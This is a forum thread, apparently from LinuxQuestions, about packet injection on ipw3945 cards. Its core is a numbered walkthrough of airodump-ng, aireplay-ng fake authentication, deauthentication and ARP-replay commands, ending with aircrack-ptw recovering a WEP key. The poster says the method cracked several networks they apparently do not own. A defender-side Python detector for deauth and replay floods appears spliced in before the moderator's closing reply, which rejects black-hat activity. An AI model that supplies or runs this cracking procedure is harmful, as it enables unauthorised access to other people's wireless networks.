Injection
OK... I resolved the first issue... here's a new one.
airodump is working PERFECT (I'm using ipw3945); aireplay just doesn't inject packets... I get no errors... and I did try to do an ARP attack and it did show ARP requests... so I think it is working to that extent... but as soon as it starts sending (it's sending thousands of packets), I am receiving no more IVs. I am using BackTrack... I believe I am using the right commands... I am using the same commands as I was instructed to in the tutorials... (believe me, I have googled a lot lol)
I could be wrong about this, but last time I had heard, the ipw* devices were not yet capable of stable packet injection.
Doing a quick Google, I found some posts as recent as Nov 16th on the Kismet forums that say the ipw3945 is just not capable of packet injection. Have you seen elsewhere that injection should be working on your device?
Same
I haven't been able to send packets with my ipw3945 either. I'm using kismet to get info, airodump to capture, aireplay to deauth, and aireplay to replay/resend packets. aireplay would read like 10000 and couldn't even find a single ARP. Maybe I'm doing something wrong? MS3FGX, what commands are you using?
Hello,
I have the same problems... seems like there is no solution to make injection work on IPW3945!!! Or?? If anyone knows, please post! Here are my commands, using BackTrack beta2 on an HP notebook (Centrino, of course):
monitor mode: airmon-ng start eth1 4
airodump: airodump-ng --ivs -w dump --channel 4 eth1
injection (not working :( ):
aireplay-ng -3 -b MACofAP -h MACofHOST -x 512 eth1
aireplay-ng -0 10 -a MACofAP -c MACofHOST eth1
airodump works fine, injection doesn't work. There is a patch for IPW2200 cards, but I haven't seen anything for IPW3945.
greets, 23.
Alright Folks,
Happy to say that I have been able to perform injection on ipw3945 cards using WifiWay. I tried BackTrack to no avail. It would seem that since they have a special "Load IPW3945" option they would have solved this problem. Turns out it's a big fat "No" (I love the software though). So after a lot of digging around, it was apparent that the ipw3945 driver on BackTrack wasn't patched for injection (refer to the Aircrack website for notes on how almost every driver needs to be patched for injection--they have no patch for ipw3945 as of now). BackTrack has lots of other drivers that are patched for injection (check this website for listings of card compatibility and patched drivers--http://backtrack.offensive-security.com/index.php?title=HCL:Wireless). Now the only thing on the internet (yes, and I can say this with confidence because I have SCOURED the internet) that claims to have a ready-to-rumble patched ipw3945 driver is WifiWay. Good news first... it works! Bad news... good support is difficult to find since everything is written in poor English (nothing personal guys :-), I love the distro). So I am writing this for all the rest of us ignorant non-Spanish-speaking Americans (aside-- if you need more tech info and come across a site in Spanish, try Google's page translator; it converts it from Spanish to somewhat readable English). The first thing you will notice is that WifiWay is not as fancy as BackTrack in that it doesn't have all the bells and whistles, but it gets the job done for ipw3945 cards. Also WifiWay is slightly different in the way it gets the job done. They use two different devices (virtual or otherwise), rtap0 for monitoring and wifi0 for injection.
Also for those of you rebels (and I did this too) who don't like to follow directions: if you do an iwconfig or ifconfig on a system that has been cold booted, it might seem like the card is not being recognized, as iwconfig shows up with rtap0 and wifi0 and others with no wireless extensions, and ifconfig is equally stoic. Also the wlanconfig stuff doesn't work and only comes up with "operation not supported" messages. But it's OK, forget all that stuff for now. So follow these directions closely, if not exactly, and you will soon find yourself in Wifiland. I am assuming you have used a bootable copy of WifiWay.

Cooking Directions

First do this:

1. airodump-ng rtap0
This step will help you find all the relevant info by exposing the networks around you. Kismet didn't work for me and I never really found Kismet to be of much use to me (I hear a lot of WHAT!'s... come on guys, we are using airodump and the networks that matter are the only ones that it can see; it doesn't matter if Kismet reports a thousand other networks. All the info you need for cracking can be obtained from airodump). If you already know the info of your targets (those of you who have unsuccessfully used BackTrack will have this) you can skip the first step.

2. ifconfig wifi0 down -- brings the wifi0 device down for resetting

3. Click the Filesystem icon on the desktop, get into /sys/class/net/wifi0/device and click on the rate file. Change it from 108 to 2. Remember to save changes (Ctrl+S).

4. Click on the channel file. Change it to whatever channel you want to be on (the AP channel, say from 1 to 11). Save changes.

5. Click on the bssid file. Change it to the BSSID of the AP. Save changes.

6. ifconfig wifi0 up -- brings wifi0 up again

7. airodump-ng -w file rtap0 -- you can use other filters such as --bssid, --ivs etc. This starts collecting data in the file-0x.cap file, where "x" is a number automatically assigned by airodump.

8. aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0
If this doesn't work (check this site for how success looks: http://aircrack-ng.org/doku.php?id=f...ee175e572097e3) you can do this:
aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h STATION wifi0
If you see an associated client and would like to use a deauth attack instead, you need to do aireplay-ng -0 5 -a BSSID -c STATION instead. Check the Aireplay site for details; it has all the kinds of attacks available. Ah... before I forget, if you want to confirm the injection capability of your ipw3945 card (technically you don't need to, I am telling you it works :-) ) or make sure the target is not quirky in any sense, you cannot use the -9 or --test attack in the aircrack version used by WifiWay, maybe because it's an older version of aircrack. Please let me know if you could get it to do the --test attack.

9. aireplay-ng -3 -b BSSID -h STATION wifi0
You should see the data packets (IVs) number rise in airodump. After collecting sufficient data packets (IVs) do:

10. ls, and you should see all the file-0x.cap files

11. aircrack-ptw file-01.cap -- Aircrack will expose the WEP key.

--> ESSID is the name of the network ("John", "Cindy's Network", etc.), BSSID is the MAC of the AP, STATION is the MAC of your wireless card.

That's it. What I realized is that using WifiWay and ipw3945 is the easiest way to do this. My Dell with an Atheros card using the madwifi-ng driver gave me much more trouble (btw you need to do wlanconfig to use madwifi-ng because it creates virtual APs that use the same card; you can find stuff about it on the internet). One problem I have faced (and this has nothing to do with WifiWay) is that for some networks, after step 9, the read ARP count keeps rising but the sent and got ARP packets number doesn't. They're stuck at zero? I think this has to do with the network signal strength, since all the networks I have been able to crack had high signal strength.
I don't think it's a MAC filter on the AP because all these networks have open authentication and I can associate with them just fine (step 8). Would appreciate any suggestions. Sorry about the noob'ishness. I know it would be awesome to actually compile this stuff in Linux and not use WifiWay (this is important not only to achieve independence but also power, since right now I am dependent on the version of Aircrack WifiWay incorporates in its software and of course can't mod it) but I am too busy and too new to Linux to do this. I would absolutely appreciate any suggestions and directions.
p.s. Respect your Freedom
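As an added, defender-side example (not code from the thread or from any of the tools it names): the two aireplay behaviours described in the post leave a recognisable signature in a monitor-mode capture, namely a burst of deauthentication frames aimed at one client and a flood of identical-length data frames from one station. The script below flags both in a stream of pre-parsed frame records; the MAC addresses and frames are constructed, and the window and threshold values are assumptions to tune per environment.

```python
"""Flag deauth bursts and same-size data-frame storms (the aireplay -0 and -3
patterns from the thread) in pre-parsed 802.11 frame records. Sample data is constructed."""
from collections import defaultdict

AP = "00:11:22:33:44:55"    # constructed BSSID, not a real network
STA = "66:77:88:99:aa:bb"   # constructed client MAC


def constructed_frames():
    # Record layout: (timestamp_s, frame_type, source, destination, bssid, frame_len)
    frames = []
    # Benign background: a few data frames of varying length over 2.5 s.
    for i in range(5):
        frames.append((0.5 * i, "data", STA, AP, AP, 200 + 30 * i))
    # Deauth burst: 10 deauths "from" the AP to the client within half a second.
    for i in range(10):
        frames.append((3.0 + 0.05 * i, "deauth", AP, STA, AP, 26))
    # Replay storm: 300 identical-size data frames from one station inside one second.
    for i in range(300):
        frames.append((5.0 + i / 300, "data", STA, AP, AP, 68))
    return frames


def max_in_window(times, window):
    """Largest number of timestamps that fall inside any interval of length `window`."""
    times = sorted(times)
    best, lo = 0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def detect_deauth_flood(frames, window=1.0, threshold=5):
    """(src, dst) pairs with at least `threshold` deauth frames in any `window` seconds."""
    by_pair = defaultdict(list)
    for ts, ftype, src, dst, _bssid, _ln in frames:
        if ftype == "deauth":
            by_pair[(src, dst)].append(ts)
    return {k for k, ts in by_pair.items() if max_in_window(ts, window) >= threshold}


def detect_replay_storm(frames, window=1.0, threshold=100):
    """(src, frame_len) keys whose identical-length data frames hit `threshold` per window.
    A replayed frame is re-injected unchanged, so its size never varies."""
    by_key = defaultdict(list)
    for ts, ftype, src, _dst, _bssid, ln in frames:
        if ftype == "data":
            by_key[(src, ln)].append(ts)
    return {k for k, ts in by_key.items() if max_in_window(ts, window) >= threshold}
```

On the constructed sample the deauth detector reports the AP-to-client pair and the storm detector reports the station with its 68-byte frames, while the benign frames trigger nothing.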
Yeah, as detailed above, we don't condone or encourage any black hat activity. Looking at your post, it seems you're more boasting about what you did rather than trying to provide help, which is also not something LQ really likes... Thirdly, this thread is old and dead, please don't drag up old ones. For simplicity I'm closing this thread now, but will leave it as is.